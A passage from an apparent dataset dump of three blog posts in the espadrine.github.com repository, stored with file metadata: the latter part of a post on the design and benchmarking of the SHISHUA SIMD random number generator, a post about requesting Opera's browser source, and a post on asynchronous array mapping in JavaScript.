compare that metric][SUPERCOP].\nA slightly lower cpb, in software or hardware, can weigh in the balance\njust enough to make a primitive win a competition,\nor become widely used by the major websites of the world.\n\n[SUPERCOP]: https://bench.cr.yp.to/supercop.html\n\nTo improve your cpb, you can do three things:\n\n1. Generate more bytes for the same amount of work, or\n2. Do less work to generate the same amount of bytes, or\n3. Parallelize work.\n\nWe will do all of the above.\n\nTherefore, to boot with point 1, we need to output more bits on each iteration.\n\nI am worried that people might say,\n“this is not a PRNG unless it outputs 32-bit numbers,” or “64-bit numbers”.\nOr more generally, “PRNGs must only rely on this subset of x86-64”;\nas if some instructions, such as `POPCNT`, or some registers, such as `%xmm7`, are off-limits.\n\nBut PRNGs are engineering: they try to make the best of the CPU, decade after decade!\nThey relied on `ROL` when it came, and on `%rax` when 64-bit CPUs landed.\nSure, it means that this algorithm might be slower on ARM (although that remains to be seen);\nbut 64-bit PRNGs were heavily used before 2019’s Android switch to a required 64-bit support!\n\nSo things evolve with the hardware.\nAnd today, Intel and AMD CPUs support 256-bit operations through [AVX2].\n\n[AVX2]: https://software.intel.com/en-us/articles/how-intel-avx2-improves-performance-on-server-applications\n[`__uint128_t`]: https://gcc.gnu.org/onlinedocs/gcc/_005f_005fint128.html\n[HWD]: http://xoshiro.di.unimi.it/hwd.c\n[my own benchmark program]: https://github.com/espadrine/shishua/blob/master/prng.c\n\nJust like RC4 outputs 1 byte, and drand48 can only output 4 at a time;\njust like pcg64 can only output 8 at a time;\nwe will output 32 bytes at a time.\n\nObviously, while 8 bytes could be output as a 64-bit number,\nwhich most programming languages have a built-in type for,\nfew have a type for 16 bytes (C’s [`__uint128_t`] being a notable exception);\nfewer yet have one for 32 bytes (aside from intrinsics).\n\nSo we must say goodbye to the typical PRNG function prototype\n(here taken from Vigna’s [HWD] benchmark program):\n\n static uint64_t next(void);\n\nInstead, we can have the generator take a buffer to fill\n(here taken from [my own benchmark program]):\n\n void prng_gen(prng_state *s, __uint64_t buf[], __uint64_t size);\n\nAre there disadvantages?\n\nWell, if your generator outputs 32 bytes at a time,\nyou need the consumer to give an array that is a multiple of 32 bytes;\nideally, an array aligned to 32 bytes.\n\nAlthough, with a tiny bit more work, you don’t.\nJust fill a buffer. Output from it what has not been consumed;\nrefill it as needed.\n\nThat does make *latency* unpredictable: some calls will only read the buffer.\nBut it averages out the same.\n\nSo now we generate more bytes for the same amount of work.\nNext step: how do we parallelize work?\n\n## Parallelism\n\nThe CPU offers an incredible wealth of parallelism at every level.\n\nFirst, of course, are the SIMD instructions (Single-Instruction, Multiple Data).\nFor instance, AVX2 does four 64-bit additions in parallel, or eight 32-bit ones, etc.\n\nIn cryptography, it has been severely relied upon for fifteen years.\nNotably, [ChaCha20] gains an incredible amount of speed from it;\nmost important primitives that don’t use AESNI rely on that.\nFor instance, [NORX] and [Gimli] are designed with that in mind.\n\n[ChaCha20]: https://github.com/floodyberry/supercop/tree/master/crypto_stream/chacha20/dolbeau/amd64-avx2\n[NORX]: https://norx.io/data/norx.pdf\n[Gimli]: https://cryptojedi.org/papers/gimli-20170627.pdf\n\nRecently, there has been increasing interest in the non-cryptographic PRNG community.\n\nIn particular, existing primitives not designed for SIMD can be the basis\nfor building a very fast PRNG.\n\nFor instance, Sebastiano Vigna, while pushing for his [xoshiro256++] design\nin the Julia programming language’s standard library,\n[learnt][Julia] that concatenating the output of eight concurrent instances of the PRNG\ninitialized differently, was made very fast by having each operation of the design\nperformed simultaneously on each PRNG.\n\n[xoshiro256++]: http://prng.di.unimi.it/#speed\n[Julia]: https://github.com/JuliaLang/julia/issues/27614#issuecomment-548154730\n\nSIMD is one level of CPU parallelism, but not the only one.\nI encourage you to read [the previous article on the subject][a primer on randomness]\nto get a better picture, but I’ll mention what I relied upon.\n\n**CPU pipelining** processes multiple instructions at different stages of processing.\nWhen well-ordered to limit interstage dependencies, instructions can be processed faster.\n\n**Superscalar execution** makes the computation part of instruction happen in parallel.\nBut they must have no read/write dependencies to do so.\nWe can fit the design to reduce the risk of stalls,\nby making the write part happen long before the read.\n\n**Out-of-order execution** lets the processor execute instructions that happen later,\neven though a previous instruction is not yet done, if the later instruction has no\nread/write dependency to it.\n\nAll right, let’s dig our hands into the implementation!\n\n## Design\n\nLet’s walk through the design of something we will call SHISHUA-half,\nfor reasons that will slowly become obvious along the article.\n\nIt looks like this:\n\n\n\nLet’s dive in line by line.\n\n```c\ntypedef struct prng_state {\n __m256i state[2];\n __m256i output;\n __m256i counter;\n} prng_state;\n```\n\nOur state is cut in two pieces that both fit in an AVX2 register (256 bits).\nWe keep output around in the state to get a bit of speed,\nbut it is not actually part of the state.\n\nWe also have a 64-bit counter; it is also an AVX2 register to ease computation.\nIndeed, AVX2 has a bit of a quirk where regular registers (`%rax` and the like)\ncannot directly be transfered to the SIMD ones with a `MOV`;\nit must go through RAM (typically the stack), which costs both latency and\ntwo CPU instructions (`MOV` to the stack, `VMOV` from the stack).\n\nWe’re now going to look at generation.\nWe start by loading everything, then we loop over the buffer,\nfilling it up by 32 bytes at each iteration.\n\n```c\ninline void prng_gen(prng_state *s, __uint64_t buf[], __uint64_t size) {\n __m256i s0 = s->state[0], counter = s->counter,\n s1 = s->state[1], o = s->output;\n for (__uint64_t i = 0; i < size; i += 4) {\n _mm256_storeu_si256((__m256i*)&buf[i], o);\n // …\n }\n s->state[0] = s0; s->counter = counter;\n s->state[1] = s1; s->output = o;\n}\n```\n\nSince the function is inlined, the buffer being immediately filled at the start\nlets the CPU execute the instructions that depend on it in the calling function right away,\nthrough out-of-order execution.\n\nInside the loop, we perform three operations on the state in rapid succession:\n\n1. **SHI**ft\n2. **SHU**ffle\n3. **A**dd\n\nHence the name, SHISHUA!\n\n### First, the shift\n\n```c\nu0 = _mm256_srli_epi64(s0, 1); u1 = _mm256_srli_epi64(s1, 3);\n```\n\nAVX2 does not support rotations, sadly.\nBut I want to entangle bits from one position in the 64-bit numbers,\nto other bit positions! And shift is the next best thing for that.\n\nWe must shift by an odd number so that each bit reaches all 64-bit positions,\nand not just half.\n\nShift loses bits, which removes information from our state.\nThat is bad, so we minimize the loss: the smallest odd numbers are 1 and 3.\nWe use different shift values to increase divergence between the two sides,\nwhich should help lower the similarity of their self-correlation.\n\nWe use rightward shift because the rightmost bits have the least diffusion in addition:\nthe low bit of `A+B` is just a XOR of the low bits of `A` and `B`, for instance.\n\n### Second, the shuffle\n\n```c\nt0 = _mm256_permutevar8x32_epi32(s0, shu0); t1 = _mm256_permutevar8x32_epi32(s1, shu1);\n```\n\nWe use a 32-bit shuffle because it is the only one that is both a different granularity\nthan the 64-bit operations that we do everywhere else (which breaks 64-bit alignment),\nand that can also cross lanes\n(other shuffles can only move bits within the left 128 bits if they started on the left,\nor within the right 128 bits if they started on the right).\n\nHere are the shuffle constants:\n\n```c\n__m256i shu0 = _mm256_set_epi32(4, 3, 2, 1, 0, 7, 6, 5),\n shu1 = _mm256_set_epi32(2, 1, 0, 7, 6, 5, 4, 3);\n```\n\nTo make the shuffle really strenghten the output, we move weak (low-diffusion) 32-bit parts\nof the 64-bit additions to strong positions, so that the next addition will enrich it.\n\nThe low 32-bit part of a 64-bit chunk never moves to the same 64-bit chunk as its high part.\nThat way, they do not remain in the same chunk, encouraging mixing between chunks.\n\nEach 32-bit part eventually reaches all positions circularly: A to B, B to C, … H to A.\n\nYou might notice that the simplest shuffle that follows all those requirements\nare simply those two 256-bit rotations (rotation by 96 bits and 160 bits rightward, respectively).\n\n### Third, the addition\n\nLet’s add 64-bit chunks from the two temporary variables,\nthe shift one and the shuffle one, together.\n\n```c\ns0 = _mm256_add_epi64(t0, u0); s1 = _mm256_add_epi64(t1, u1);\n```\n\nThe addition is the main source of diffusion: it combines bits\ninto irreducible combinations of XOR and AND expressions across 64-bit positions.\n\nStoring the result of the addition in the state keeps that diffusion permanently.\n\n### Output function\n\nSo, where do we get the output from?\n\nEasy: the structure we built is laid out in such a way that\nwe are growing two independent pieces of state: `s0` and `s1`,\nwhich never influence each other.\n\nSo, we XOR them, and get something very random.\n\nIn fact, to increase the independence between the inputs that we XOR,\nwe take the partial results instead: the shifted piece of one state,\nand the shuffled piece of the other.\n\n```\no = _mm256_xor_si256(u0, t1);\n```\n\nThat also has the effect of reducing the read/write dependencies between superscalar CPU instructions,\nas `u0` and `t1` are ready to be read before `s0` and `s1` are.\n\nYou may have noticed that we did not talk about the counter yet.\nIt turns out we handle it at the start of the loop.\nWe first change the state, and then increment the counter:\n\n```c\ns1 = _mm256_add_epi64(s1, counter);\ncounter = _mm256_add_epi64(counter, increment);\n```\n\nThe reason we change the state first, and then update the counter,\nis so that `s1` becomes available sooner,\nreducing the risk that later instructions that will read it get stalled\nin the CPU pipeline.\nIt also avoids a direct read/write dependency on the counter.\n\nThe reason we apply the counter to s1 and not s0,\nis that both affect the output anyway.\nHowever, `s1` loses more bits from the shift,\nso this helps it get back on its feet after that harmful shearing.\n\nThe counter is not necessary to beat PractRand.\nIts only purpose is to set a lower bound of 2<sup>69</sup> bytes = 512 EiB\nto the period of the PRNG:\nwe only start repeating the cycle after one millenia at 10 GiB/s,\nwhich is unlikely to ever be too low for practical applications in the coming centuries.\nThanks to this, there are no bad seeds.\n\nHere are the increments:\n\n```c\n__m256i increment = _mm256_set_epi64x(1, 3, 5, 7);\n```\n\nThe increments are picked as odd numbers,\nsince only coprimes of the base cover the full cycle of the finite field GF(2<sup>64</sup>),\nand all odd numbers are coprime of 2.\n\n(In other words, if you increment by an even number between integers 0 to 4,\nwrapping around to 0 when you go past 4,\nyou get the sequence 0-2-0-2-…, which never outputs 1 or 3;\nbut an odd increment goes through all integers.)\n\nWe use a different odd number of each 64-bit number in the state,\nwhich makes them diverge more, and adds a tiny bit of stirring.\n\nI picked the smallest odd numbers so that they don’t look like magic numbers.\n\nSo, there we go! That is how the state transition and output function work.\n\nNow, how do we initialize them?\n\n### Initialization\n\nWe initialize the state with the hex digits of Φ,\nthe irrational number that is least approximable by a fraction.\n\n```c\nstatic __uint64_t phi[8] = {\n 0x9E3779B97F4A7C15, 0xF39CC0605CEDC834, 0x1082276BF3A27251, 0xF86C6A11D0C18E95,\n 0x2767F0B153D27B7F, 0x0347045B5BF1827F, 0x01886F0928403002, 0xC1D64BA40F335E36,\n};\n```\n\nWe take a 256-bit seed, which is common in cryptography,\nand doesn’t really hurt in non-cryptographic PRNGs:\n\n```c\nprng_state prng_init(SEEDTYPE seed[4]) {\n prng_state s;\n // …\n return s;\n}\n```\n\nWe don’t want to override a whole piece of state (`s0` nor `s1`) with the seed;\nwe only want to affect half.\nThat way, we avoid having debilitating seeds that,\npurposefully or accidentally, set the state to a known weak start.\n\nWith half of each state intact, they still keep control over 128 bits of state,\nwhich is enough entropy to start and stay strong.\n\n```c\ns.state[0] = _mm256_set_epi64x(phi[3], phi[2] ^ seed[1], phi[1], phi[0] ^ seed[0]);\ns.state[1] = _mm256_set_epi64x(phi[7], phi[6] ^ seed[3], phi[5], phi[4] ^ seed[2]);\n```\n\nThen we do the following thing a `ROUNDS` number of times:\n\n1. Run `STEPS` iterations of SHISHUA,\n2. Set one piece of the state to the other, and the other to the output.\n\n```c\nfor (char i = 0; i < ROUNDS; i++) {\n prng_gen(&s, buf, 4 * STEPS);\n s.state[0] = s.state[1];\n s.state[1] = s.output;\n}\n```\n\nSetting to the output increases the diffusion of the state.\nIn the initialization, the added work and state correlation don’t matter,\nsince this is only done a few times, once.\nYou only care about diffusion in initialization.\n\nI picked values of 5 for `STEPS` and 4 for `ROUNDS`\nafter looking at how much they impacted seed correlation.\n\n(I computed seed correlation by counting the “unusual” and “suspicious” anomalies\ncoming out of the PractRand PRNG quality tool.)\n\n## Performance\n\nSpeed measurement benchmarks are tricky for so many reasons.\n\n- **Clock** measurements can lack precision.\n- The CPU has so much **parallelism**, that tracking when instructions start and end,\n is both nondeterministic and heavily dependent on other events on the CPU.\n- Obviously, from one CPU vendor to the next, the resuts will be different.\n That is also true from one CPU **series** to the next from the same vendor.\n- CPUs nowadays have **[variable frequency]**: they get purposefully slower or faster\n depending on the need for low power consumption or the risk of high temperature.\n\nI use a dedicated CPU instruction, `RDTSC`, which computes the number of cycles.\n\nTo make sure that everyone can reproduce my results, I use a cloud virtual machine.\nIt doesn’t change the order of the benchmark results compared to a local test;\nit also avoids requesting that other people buy the same computer as the one I have.\nFinally, there are many use-cases where PRNGs would be used in the cloud on those instances.\n\nI chose Google Cloud Platform’s N2 (Intel chip) and N2D (AMD chip).\nThe advantage of GCP is that they have chips from both vendors.\nWe’ll focus on Intel here, but the orders of magnitude are similar for AMD.\n\nTo give a bit of context, let’s first look at an old cryptographic generator, RC4.\nImpossible to parallelize; I got **7.5 cpb** (cycles spent per generated byte).\n\n[variable frequency]: https://www.intel.com/content/www/us/en/architecture-and-technology/turbo-boost/turbo-boost-technology.html\n[RC4]: http://cypherpunks.venona.com/archive/1994/09/msg00304.html\n[Lehmer128]: https://lemire.me/blog/2019/03/19/the-fastest-conventional-random-number-generator-that-can-pass-big-crush/\n[wyrand]: https://github.com/wangyi-fudan/wyhash/blob/master/wyhash_v6.h\n[Xoshiro256+]: http://prng.di.unimi.it/xoshiro256plus.c\n[RomuTrio]: http://www.romu-random.org/\n[Xoshiro256+ 8 times]: http://prng.di.unimi.it/#speed\n\nNow, let’s look at a very common and fast MCG: [Lehmer128],\nthe simplest PRNG that passes BigCrush: **0.44 cpb**. Wow, not bad!\n\nFor kicks, let’s make another detour through modern cryptographic designs.\nThey rely on a lot of the tricks that we saw.\nTake ChaCha8 for instance.\nIt reaches… **0.46 cpb**! About the same as the really fast one we just saw!\n\nSIMD really works its magic!\n\nTo the cryptographic community, [this is not a complete surprise][djb remarks].\nChaCha8 is just insanely easy to parallelize.\nIt is just a counter in a diffused state, well-hashed.\n\n[djb remarks]: https://twitter.com/hashbreaker/status/1023965175219728386\n\nNext, a recent mixer that is the basis for fast hash tables: [wyrand].\n**0.41 cpb**, slightly better!\n\nAmong Vigna’s fast PRNG, some don’t pass 32 TiB of PractRand, but are very fast.\n[Xoshiro256+] fails at 512 MiB but is among the fastest of the bunch: **0.34 cpb**.\n\nLet’s look at a recent entry, from earlier this year: [RomuTrio].\nIt claims the title of fastest PRNG in the world: **0.31 cpb**.\n\nAlright, enough. How does SHISHUA-half fare?\n\n**0.14 cpb**. Twice as fast as RomuTrio.\n\n\n\nGiven its quality, it is unmatched.\n\nBut remember how the Julia team looked at\ncombining multiple instances of Vigna’s design\nto make a fast SIMD PRNG?\nLet’s look at Vigna’s fastest result using this technique:\n[Xoshiro256+ 8 times]. **0.07 cpb**!\n\n(Technically, it varies on the machine;\non my laptop, SHISHUA-half is faster than this.)\n\n---\n\nSure, the resulting meta-PRNG (which I dub Xoshiro256+x8)\nhas *terrible statistical biases* that fail many simple tests.\n\nBut, let’s beat its speed anyway, without betraying our high quality standards.\n\nNow you probably guess why we called our earlier primitive SHISHUA-half.\n\nIt turns out getting twice as fast is easy by doubling SHISHUA-half.\n\nSimilar to the Julia insights, we have two PRNGs initialized differently\n(four blocks of 256-bit state),\noutputting their thing one after the other.\n\nBut with more state, we can output even more stuff,\nby combining the four states pairwise:\n\n```c\no0 = _mm256_xor_si256(u0, t1);\no1 = _mm256_xor_si256(u2, t3);\no2 = _mm256_xor_si256(s0, s3);\no3 = _mm256_xor_si256(s2, s1);\n```\n\nAnd that is how you get SHISHUA, and its **0.06 cpb** speed.\n\nFive times faster than the previously-fastest in the world\nthat passes 32 TiB of PractRand.\nYou can barely see it in the graph, so I removed RC4.\n\n\n\nI guess my point is that it is somewhat competitive.\n\n(In fact, it is even faster on my laptop, at 0.03 cpb,\nbut I want to stick to my benchmark promises.\nMaybe we lose a tiny bit of performance on early AVX-512 CPUs.)\n\nHopefully, SHISHUA stays the fastest in the world for at least a few weeks?\n(Please make it so.)\n\n## Quality\n\nIt passes BigCrush and 32 TiB of PractRand without suspicion.\n\nIn fact, all of its four outputs do.\n\nOne of the not-ideal aspects of the design is that SHISHUA is **not reversible**.\n\nYou can see this with a reduction to a four-bit state, with `s0 = [a, b]` and `s1 = [c, d]`.\nThe shift will yield `[0, a]` and `[0, d]`; the shuffle will give `[b, c]` and `[d, a]`.\n\nThe new `s0` is `[b, c] + [0, a] = [b⊕(a∧c), a⊕c]`, and `s1` is `[d, a] + [0, c] = [d⊕(a∧c), a⊕c]`.\n\nIf `a = ¬c`, then `a⊕c = 1` and `a∧c = 0`, thus `s0 = [b, 1]` and `s1 = [d, 1]`.\nSo there are two combinations of `a` and `c` that give the same final state.\n\nIt is not an issue in our case, because the 64-bit counter is also part of the state.\nSo you have a minimum cycle of 2⁷¹ bytes (128 bytes per state transition),\nwhich lasts seven millenia at 10 GiB/s.\nSo that counterbalances the lost states.\n\nBesides, even despite the irreversibility,\nthe average state transition period is `2^((256+1)÷2)`.\nThat gives an average cycle of 2¹³⁵ bytes\n(more than a trillion times the age of the universe to reach at 10 GiB/s).\nAlthough, in my opinion, average cycles are overrated,\nas they give no indication on the quality of the output.\n\nAlright, here is the distilled benchmark:\n\n<table id=benchmark>\n <tr><th>Name <th>Performance <th>Quality <th>Seed correlation\n <tr><td>SHISHUA <td>0.06 <td>>32 TiB <td> >32 TiB\n <tr><td>xoshiro256+x8 <td>0.07 <td> 1 KiB <td> 0 KiB\n <tr><td>RomuTrio <td>0.31 <td>>32 TiB <td> 1 KiB\n <tr><td>xoshiro256+ <td>0.34 <td>512 MiB <td> 1 KiB\n <tr><td>wyrand <td>0.41 <td>>32 TiB <td> 32 KiB\n <tr><td>Lehmer128 <td>0.44 <td>>32 TiB <td> 1 KiB\n <tr><td>ChaCha8 <td>0.46 <td>>32 TiB?<td> >32 TiB?\n <tr><td>RC4 <td>8.06 <td> 1 TiB <td> 1 KiB\n</table>\n\n1. **Performance**: in number of CPU cycles spent per byte generated,\n on N2 GCP instances. On N2D (AMD), the order is the same.\n2. **Quality**: level at which it fails PractRand. We show a `>` if it did not fail.\n We put a question mark if we have not proved it.\n3. **Seed correlation**: PractRand on interleaving of bytes from eight streams\n with seeds 1, 2, 4, 8, 16, 32, 64, 128.\n We use PractRand with folding 2 and expanded tests.\n\nSpeed measurement is traditionally in cpb.\nGiven the speed we get to nowadays,\na more appropriate measurement is in number of bits generated per CPU cycle.\nNot only do I find it easier to grasp,\nit is also much easier to compare huge differences on the graph:\n\n\n\n## Next\n\nWhile there are no practical issue with irreversibility in our case,\nit also means that we can improve on SHISHUA.\n\nMy ideal PRNG would have the following properties:\n\n1. **The state transition is a circular permutation**, giving a way-more-than-enough 2¹⁰²⁴ bytes cycle.\n As in, it would take more than 10²⁸² times the age of the universe to reach the end at 10 GiB/s,\n instead of SHISHUA’s seven millenia.\n It is not exactly “better” (impossible is impossible);\n but if we can reduce the design to a smaller state without affecting diffusion,\n we might be able to get a faster PRNG.\n Do you think we might be able to fit one in ARM’s 128-bit NEON registers?\n Also, we would no longer need the counter, removing two additions.\n2. **The output function is provably irreversible**.\n The way SHISHUA XORs two independent numbers already has that property,\n but I haven’t proved that the numbers are truly decorrelated.\n3. **The state initialization is irreversible**\n with each state having 2¹²⁸ possible seeds (to prevent guessing the seed).\n The way SHISHUA sets the state to its own output is likely irreversible.\n After all, it uses SHISHUA’s state transition (partially irreversible)\n and its output function (seemingly irreversible, see point 2).\n4. **The state initialization has perfect diffusion**:\n all seed bits affect all state bits with equal probability.\n I’d like to compute that for SHISHUA.\n\nOne issue holding back PRNGs and cryptography overall is the lack of better, general-purpose tooling.\n\nI want a tool that can instantly give me an accurate score,\nallowing me to compare designs on the spot.\n\nPractRand is great compared to what came before it; but:\n\n- It cannot rate high-quality generators, making comparisons between them impossible.\n We just get to say “well, they both had no anomalies after 32 TiB…”\n- It takes weeks to run…\n\nI believe great improvements are coming.\n\n---\n\nDiscussions on\n[Reddit](https://www.reddit.com/r/prng/comments/g3nh4i/shishua_the_fastest_prng_in_the_world/)\nand\n[Hacker News](https://news.ycombinator.com/item?id=22907539)\n.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-04-18T16:59:00Z\",\n \"keywords\": \"prng, crypto\" }\n</script>\n"
},
{
"alpha_fraction": 0.7101505398750305,
"alphanum_fraction": 0.7371671199798584,
"avg_line_length": 40.790321350097656,
"blob_id": "f3c28409ee8202f0b16f54e77c8362d57cd3d5aa",
"content_id": "feed0a987942c1dd2e105699702cc003bb70fbe1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2595,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 62,
"path": "/blog/src/opera-an-open-source-browser.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Opera, an Open-Source Browser?\n\nI honestly do hope I am not hereby embracing [Betteridge's law of headlines](http://en.wikipedia.org/wiki/Betteridge). Please believe me.\n\nEver since the switch to Chromium away from Presto, I have eagerly waited for the first public snapshot. I expected to get my hands on the code by then.\n\nIt is their right to not give direct access to the code, though. The fact that they chose to use that right should not make me suspicious. All I had to do, after all, was [email their open-source address](https://twitter.com/opera/status/339658208656375808), <opensource>. What happened then was rather odd.\n\nBut let's get the facts as they happened. I sent them a mail on May 30th.\n\n> Good morning / afternoon / evening / night,\n>\n> I wish to get a copy of the source code for Opera.\n> May I?\n> Thanks in advance.\n>\n> Yours sincerely,\n> Thaddée Tyl.\n\nThey answered later that day,\n\n> Dear Thaddée Tyl,\n>\n> We have received your request, and information on how to get access will be sent to\n> via email as soon as we have source package ready.\n>\n> --\n> Kind regards,\n> Haakon\n> Opera Software\n> <http:></http:>\n\nAnd I waited. Two weeks. Then:\n\n> Good morning / afternoon / evening / night,\n>\n> I am unsure what the situation is on your side related to my\n> two-weeks-old request, so I decided to ask you. Is the process of\n> preparing the tarball of Opera's source ongoing? Have you lost my\n> email address?\n>\n> Yours sincerely,\n> Thaddée Tyl.\n\nTheir answer:\n\n> This is the mail system at host smtp-new.opera.com.\n> I'm sorry to have to inform you that your message could not\n> be delivered to one or more recipients. It's attached below.\n> […]\n> <opensource>: User unknown in virtual alias table\n\nSure, their old [FAQ](http://business.opera.com/press/faq/) still insists that they are not planning to go open-source. From a legal standpoint, they can. Chromium is released under the [BSD license](http://src.chromium.org/viewvc/chrome/trunk/src/LICENSE), which allows them to keep their fork proprietary — at least, that is my understanding. But then, don't say [you went open-source](https://twitter.com/opera/status/339658208656375808)!\n\nUPDATE: Opera [responded](https://twitter.com/opera/status/345616182738554883). They didn't delete <opensource> (phew!), but they are moving mail servers. Also, they are still working on packaging the source for the desktop. </opensource></opensource></opensource>\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-06-14T19:01:00Z\",\n \"keywords\": \"web\" }\n</script>\n"
},
{
"alpha_fraction": 0.6693310141563416,
"alphanum_fraction": 0.6788569092750549,
"avg_line_length": 50.02234649658203,
"blob_id": "60310ee302519a5e6dbe437c52383dbf014c4cb2",
"content_id": "5c72ed36d912306cf700136b4096129a15eea8ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9141,
"license_type": "no_license",
"max_line_length": 881,
"num_lines": 179,
"path": "/blog/src/array-processing-in-event-loops.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Array Processing In Event Loops\n\nMuch has been said about the use of event loops in JavaScript, especially because of their extensive use in node.js. Much has been said about how coroutines could help avoid the pyramid of doom that the event loop constructs causes.\n\n f(function(g) {\n g(function(h) {\n h(function() {\n ...\n });\n });\n });\n\nDave Herman [argues](http://calculist.org/blog/2011/12/14/why-coroutines-wont-work-on-the-web/) that coroutines cannot work in the web because it makes any function call a potential preemption point that might use multiple event loop cycles before completion. That's the whole spirit (and danger) of `yield` in coroutines. This old Racket hacker would rather have `call/cc` (call with current continuation), a Scheme mechanism that allows to save the completion of a function into some sort of function variable that you can then run whenever you want. For the next version of the ECMAScript standard, however, he settles for generators, which are much safer than coroutines, while providing similar (albeit not nearly as powerful) constructs. The basic difference is that a generator cannot suspend the function that called it: in this respect, it feels a lot like a stateful function.\n\nBefore that, Vyacheslav Egorov [published a rant](https://plus.google.com/111090511249453178320/posts/LB6LAk3fPUy) in which he points out that, while indeed coroutines do not make it obvious that they don't necessarily run to completion, (since they are syntactically the same as functions), the equivalent, \"spaghetti code\", node.js construct for non-blocking I/O raises a similar concern. Callbacks can either be run in the same event loop cycle as the function that is calling them, or they can be run several spins away. Shared state between the closure and the function it is nested in is hence insecure. It can be easily manipulated wrong.\n\nOne such case that I found while using node.js' APIs is while processing arrays.\n\nHad the solution been too obvious to need any help, or too specific to be generally corrected, I wouldn't have raised my voice. The thing is, I believe it is time to have constructs such as the one I will present, either in node.js' library, or directly in ECMAScript.\n\n[Small note: if you'd rather read highlighted code than a whole article, [here](https://gist.github.com/1640136) is a fine place to be.]\n\nFor the purpose of the argument, let's first create a function that, just like those in node.js, takes a function callback as an argument, but only runs it several event loop cycles later.\n\n function differedFactorial(n /* Number */, cb /* Function */) {\n if (n < 0) cb(new Error('Complex infinity'));\n setTimeout(function() {\n var result = 1;\n for (; n > 1; n--) {\n result = result * n;\n }\n cb(result);\n }, 300);\n }\n\nWhen you know you have such a function, you must be careful how you use it.\n\nSuppose you have an array of numbers. You want them processed by our `differedFactorial` function. You may think that you can map the array at first. How wrong.\n\n var a = [2, 4, 6, 9];\n console.log(a.map(function(e) {\n var result;\n differedFactorial(e, function(res) {\n result = res;\n });\n return result;\n }));\n\nThe result you get is an array of four `undefined` values.\n\nWhy is that?\n\nThe basic issue is that you run through the `map` function. When the `differedFactorial` function is hit, its callback is not run. As a result, what we return is a value that has not yet been assigned, `undefined`.\n\nHow can we make it work?\n\nWe can construct a new map function that accommodates the callback system. Let's try a first draft of such a function.\n\n Array.prototype.asyncMap = function(f /* Function */, cb /* Function */) {\n var l = [], len = this.length;\n for (var i = 0; i < len; i++) {\n f(this[i], i, this, function(e) {\n l.push(e);\n if (l.length === len) {\n cb(l);\n }\n });\n }\n };\n\n a.asyncMap(function(e, i /* Number */, a /* Array */, cb /* Function */) {\n differedFactorial(e, function(res) { cb(res); });\n }, function(result) {\n console.log(result);\n });\n\nThis seems to work, at first sight. Inside the array that we construct, the length property tells us when to return the result.\n\nHowever, an important contract that we make with the user is that, in all cases, he must call asyncMap’s callback once for each element that is processed by differedFactorial. Otherwise, we will never return anything, and there will be no warning, exception or whatsoever.\n\nBut even in this implementation, there remains an important issue. In order to make this issue obvious, let’s construct a derived differedFactorial.\n\n function differedFactorial(n /* Number */, cb /* Function */) {\n if (n < 0) cb(new Error('Complex infinity'));\n setTimeout(function() {\n var result = 1;\n for (; n > 1; n--) {\n result = result * n;\n }\n cb(null, result); // No errors, result is given.\n }, 150 + Math.abs(300 * Math.random()));\n }\n\n\nThis time, the dummy non-blocking cross-cycle function probably won't return values in order. Indeed, it runs the callback after a random amount of time.\n\nAs a result, the order of the elements in the returned list is not that of the elements in the list we passed in.\n\nThe following function preserves order. An interesting side-effect is that, while it does allocate more than the previous implementation (because of that `processing` variable), it takes just as long to compute.\n\n Array.prototype.asyncOrderedmap = function(f /* Function */,\n cb /* Function */) {\n var processing = 0,\n l = new Array(this.length),\n len = this.length;\n for (var i = 0; i < len; i++) {\n f(this[i], i, this, function(e, idx) {\n l[idx] = e;\n processing++;\n if (processing === len) {\n cb(l);\n }\n });\n }\n };\n\nAn additional requirement on the user is that, whenever he sends a processed value from the array, he must also indicate its index.\n\n a.asyncOrderedMap(function(e,\n i /* Number */,\n a /* Array */,\n cb /* Function */) {\n // The callback has one more argument, the index.\n differedFactorial(e, function(res) { cb(res, i); });\n }, function(result) {\n console.log('asyncOrderedMap: %s', result);\n });\n\nThis algorithm is not trivial. I used to write it directly, with no function to help me. It seemed only too obvious. But I was wrong, because I assumed too much.\n\nFor instance, I had to track down a very strange bug that only occurred in certain conditions. That bug was present in real code, but as soon as I tried to test the segment of code that I knew was buggy, then that particular piece of code worked perfectly.\n\nThe issue was that the length of the array varied whilst I was processing it. Indeed, since processing took more than one event loop cycle, another piece of code was sometimes adding new elements to it. The only thing that made it break is that I only stopped processing the array when the length of the new array matched the planned length that I had calculated at the beginning. Of course, once one element had been added to the original array, the new array would never reach the length of the original array, since it was topped by the length initially calculated.\n\nHad I used `asyncOrderedMap`, it would have spared me a lot of debugging time.\n\nMy point is that the Event-Loop model has bad parts, but they can easily be overcome by completing the standard library.\n\nBeginners in node.js struggle with those bad parts. They wouldn’t if an asynchronous library was added to the built-in libraries in node.js.\n\nThere is a such library, amongst the npm modules, that I have found quite good. It frees the user from one of the contracts of asyncOrderedMap: we don’t have to give the index of the current element to the callback. They achieve that by adding state to the list we give them.\n\nTry it today.\n\nInstall it with:\n\n npm install async\n\nYou can check that it solves the problem presented here quite fine:\n\n var async = require('async');\n\n function differedFactorial(n /* Number */, cb /* Function */) {\n if (n < 0) cb(new Error('Complex infinity'));\n setTimeout(function() {\n var result = 1;\n for (; n > 1; n--) {\n result = result * n;\n }\n cb(null, result); // No errors, result is given.\n }, 150 + Math.abs(300 * Math.random()));\n }\n \n var a = [2, 4, 6, 9];\n async.map(a, differedFactorial, function(err, res) {\n console.log(res);\n });\n\nMoreover:\n\n- if you are part of the core development team at `node.js`, include it.\n- if you are not, beg them to do so!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2012-01-21T18:29:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.6468647122383118,
"alphanum_fraction": 0.6578657627105713,
